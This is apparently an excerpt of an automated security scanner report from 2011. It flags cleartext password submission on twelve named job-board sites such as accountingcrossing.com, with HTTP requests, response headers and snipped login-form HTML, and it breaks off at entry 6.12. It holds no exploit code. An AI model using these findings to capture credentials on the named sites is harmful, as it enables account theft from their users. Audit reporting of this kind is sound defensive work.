Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://www.100kcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.100kcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.100kcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4gi6e55n6c5ims48r8g0gv1692; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:12 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106106

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.100kcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.2. http://www.accountingcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accountingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.accountingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m8i6cd531h6rsd383n5t999356; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116767

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.accountingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.3. http://www.accountmanagementcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accountmanagementcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.accountmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bvhhpa1stegtb9iluknr76tt84; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 137270

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.accountmanagementcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.4. http://www.actuarialcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.actuarialcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.actuarialcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gfsjuvk6a0eja28o52r05s3445; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114356

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.actuarialcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.5. http://www.admincrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.admincrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.admincrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9hecq37ajcfirr9ve90dobkne6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109804

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.admincrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.6. http://www.advertisingcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.advertisingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.advertisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4vstlithvj0cev5m57soav4bi3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121935

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.advertisingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.7. http://www.aerospacecrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aerospacecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.aerospacecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:33 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=smekqvtb2jtrk9a1sqbg5kk4u3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.aerospacecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.8. http://www.agriculturalcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.agriculturalcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.agriculturalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:34 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ukabttsk8nejv6h58lpcqprfk1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102618

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.agriculturalcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.9. http://www.architecturecrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.architecturecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.architecturecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:50 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u8cdprgtig27p3jst5fgnvcol0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125304

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.architecturecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.10. http://www.attorneyresume.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.attorneyresume.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.attorneyresume.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:24 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=3oi3tsj2agglmdtggh0p0r2jo5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80394

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="SHORTCUT ICON" href="http://www.attorneyresume.com/faviconar.ico">
<titl
...[SNIP]...
</script>
                            <form name="formmainlogin" action="" method="POST" onsubmit="return LoginFrm()" style="margin:0px; padding:0px;">
           <input type=hidden name="clslogin_hdnaction" id="clslogin_hdnaction" value="">
...[SNIP]...
<input type="text" name="clslogin_email" onfocus="focusval(this.value,'Email')" onblur="blurval('Email')" value="Email" size="12" class="input" maxlength="50">&nbsp;<input type="password" name="clslogin_password" onfocus="focusval(this.value,'Password')" onblur="blurval('Password')" value="Password" size="12" class="input" maxlength="16">&nbsp;<input type="image" src="http://www.attorneyresume.com/images/bt_login.gif" width="49" height="16" border="0" alt="Log In" align="absmiddle">
...[SNIP]...

6.11. http://www.auditorcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.auditorcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.auditorcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=16al60hefdulh9nl41fvb7adh1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125427

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.auditorcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.12. http://www.automotivecrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.automotivecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.automotivecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=chphkc8gns7vn2rq112ej1g8s5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109012

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.automotivecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
